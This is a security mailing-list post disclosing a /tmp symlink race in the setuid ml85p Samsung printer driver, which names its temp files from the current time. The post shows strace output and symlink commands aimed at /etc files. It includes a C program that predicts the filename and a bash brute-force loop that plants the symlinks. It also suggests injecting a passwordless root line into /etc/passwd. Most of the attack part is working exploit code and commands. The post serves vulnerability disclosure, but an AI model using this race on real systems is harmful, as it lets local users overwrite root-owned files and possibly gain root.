ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp unsecurely.
it seems to use the time() function to determine the /tmp files name.

[rootlinux exp]# strings /usr/bin/ml85p | grep tmp
/tmp/ml85g%d

[401070dd] iopl(0x3) = 0
[400cf2bd] time(NULL) = 994462668
[40100cbf] brk(0) = 0x8064544
[40100cbf] brk(0x80646c4) = 0x80646c4
[40100cbf] brk(0x8065000) = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

TIME(2) Linux Programmer's Manual TIME(2)

NAME
       time - get time in seconds

SYNOPSIS
       #include <time.h>

       time_t time(time_t *t);

DESCRIPTION
       time returns the time since the Epoch (00:00:00 UTC, January 1, 1970), mea-
       sured in seconds.

[d0tslashlinux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
[d0tslashlinux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
[d0tslashlinux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668

This is trivial... root must run the following command.
[rootlinux exp]# /usr/bin/ml85p -s

-s simulate the printing process, but write the compressed output to a
       /tmp/ml85xxxxxxxx file, where the filename suffix is the current time in
       time_t units (seconds since 12/31/1970).

as you can see this is the one that hits us...
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

oh how nice truncation flag...

O_TRUNC
       If the file already exists and is a regular file and the open mode
       allows writing (i.e., is O_RDWR or O_WRONLY) it will be truncated to
       length 0.

[rootlinux exp]# ls -al /tmp | grep ml
-rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462665
lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462666 -> /etc/test
lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462667 -> /etc/test
lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462668 -> /etc/test
-rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462669
-rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462670

[d0tslashlinux d0tslash]$ ls -al /etc/test
-rw-r--r-- 1 root root 0 Jul 6 19:37 /etc/test

I am not sure what other OS's pick for permissions by defualt...
mandrake seems to not allow user access by default ... I don't know
what group you need to have access to use this feature.

[d0tslashlinux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied

[d0tslashlinux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p*

for shits and giggles lets see what happens if its got bad perms.
[rootlinux exp]# chmod 4755 /usr/bin/ml85p

in which case the results are as follows

[d0tslashlinux d0tslash]$ /usr/bin/ml85p -s (several times)
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463605
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463607
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463608
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463609

[d0tslashlinux d0tslash]$ cat ml85p-exp.c
// ln -s /etc/oops /tmp/ml85`./ml85p-exp`
 
#include <time.h>
#include <stdio.h>
int main(int argc,char **argv)
{
int x = time(NULL);
x = x + 30;
printf("%i\n", x);
}

[d0tslashlinux d0tslash]$ cat ml85p.sh
#!/bin/bash
# krfinisterrecheckfree.com
echo "brute.sh <low> <hi>"
L=$1
H=$2
while [ $L -lt $H ]
do
        ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
        let L=L+1
done

the following file is created.
-rw-r--r-- 1 root d0tslash 0 Jul 6 20:18 /etc/oops

not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to print
owned::0:0:root:/root:/bin/bash to this driver and it may append it to the file in /tmp... I am not sure though... just an idea
-KF

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]